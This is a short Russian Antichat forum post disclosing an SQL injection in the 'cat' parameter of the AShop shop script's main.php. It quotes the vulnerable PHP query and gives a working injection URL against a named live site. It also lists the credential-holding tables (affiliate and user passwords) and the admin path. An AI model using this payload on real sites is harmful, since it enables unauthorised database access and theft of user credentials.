Форум АНТИЧАТ - SQL-injection в Ashop.

AShop - онлайн магазин с поддержкой партнерской программы с открытым кодом продается на плати.ру. (Не путать с ASHOP Software).

Возможна SQL-инъекция в параметре $cat в main.php.
Пример уязвимой части скрипта:

PHP код:


		
			
.......

// List categories...

    if ($cat) {

       $sql="SELECT parentcategoryid from category WHERE categoryid = $cat";

       $result = @mysql_query($sql,$db);

       $parent = @mysql_result($result, 0, "parentcategoryid");

    }

........

$cat не обрамляется кавычками, передается через GET параметры.

Пример использования уязвимости, правда на 3 мускуле:

Код:

http://muzplakat.ru/main.php?cat=6+/*!32358+and+0+*/

Таблицы: affiliate(user,password,mail) и user(user, password).
Админка: /admin/index.php

ЗЫ
Скрипт не особо распространен в сети =\
ЗЗЫ
Спасибо Alexsize, за предоставленные скрипты магаза =)